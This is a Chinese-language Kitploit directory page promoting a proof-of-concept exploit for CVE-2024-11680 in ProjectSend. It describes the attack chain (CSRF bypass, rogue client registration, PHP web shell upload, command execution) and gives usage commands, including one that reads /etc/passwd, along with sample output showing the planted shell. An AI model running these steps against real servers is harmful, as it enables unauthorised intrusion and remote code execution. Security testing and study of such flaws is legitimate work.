Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-11680 — 该仓库包含针对 CVE-2024-11680 的概念验证(PoC)漏洞利用程序,这是影响 ProjectSend r1605 及更早版本的一个严重漏洞。该漏洞利用针对的是由于权限设置不正确和命令注入问题而导致的错误身份验证。 | Kitploit
工具/GitHubGitHub/qucklecrabik/cve-2024-11680
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubqucklecrabik/cve-2024-11680

CVE-2024-11680

该仓库包含针对 CVE-2024-11680 的概念验证(PoC)漏洞利用程序,这是影响 ProjectSend r1605 及更早版本的一个严重漏洞。该漏洞利用针对的是由于权限设置不正确和命令注入问题而导致的错误身份验证。

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ProjectSend CVE-2024-11680 漏洞利用

这是针对 CVE-2024-11680 的概念验证漏洞利用代码,该漏洞是 ProjectSend 中一个无需身份验证的配置修改与 Web Shell 上传漏洞。

描述

该漏洞利用工具利用了 ProjectSend 中的多个漏洞:

  • 允许修改配置的 CSRF 令牌绕过
  • 不安全的客户端注册设置
  • 无限制文件上传,导致远程代码执行

环境要求

  • Python 3.x
  • 所需的 Python 包:
    root@kitploit:~
    pip install requests colorama
    

使用方法

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c <COMMAND>

参数

  • -u, --url:目标 URL(例如:http://target.com/projectsend)
  • -c, --command:要在目标上执行的命令(默认:id)

示例

root@kitploit:~
# Get Python version
python3 exploit.py -u http://target.com/projectsend -c "python3 -V"

# List directory contents
python3 exploit.py -u http://target.com/projectsend -c "ls -la"

# Get system information
python3 exploit.py -u http://target.com/projectsend -c "uname -a"

# Read passwd file
python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"

工作原理

  1. 侦察:获取 CSRF 令牌并验证目标漏洞
  2. 配置篡改:启用不安全的客户端注册选项
  3. 用户注册:创建自动审批的新客户端账户
  4. 文件上传:上传带有 .phtml 扩展名的 PHP Web Shell
  5. 命令执行:通过上传的 Shell 执行指定命令

功能特性

  • 自动提取 CSRF 令牌
  • 随机生成用户凭据
  • 智能文件命名与时间戳检测
  • 彩色输出,提高可读性
  • 内置命令执行功能

法律声明

此工具仅用于教育目的。请负责任地使用,仅对您拥有明确权限的系统进行测试。

参考

  • CVE-2024-11680

示例输出

root@kitploit:~
[+] Target is vulnerable
[+] Insecure options enabled
[+] User registered successfully.
[+] New username: NoDLQWYF
[+] New password: X02A3g9LuN4S
[+] File uploaded: kLoISqdA.phtml
[+] File accessible at: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
[+] Command Output:
Python 3.9.2
下载工具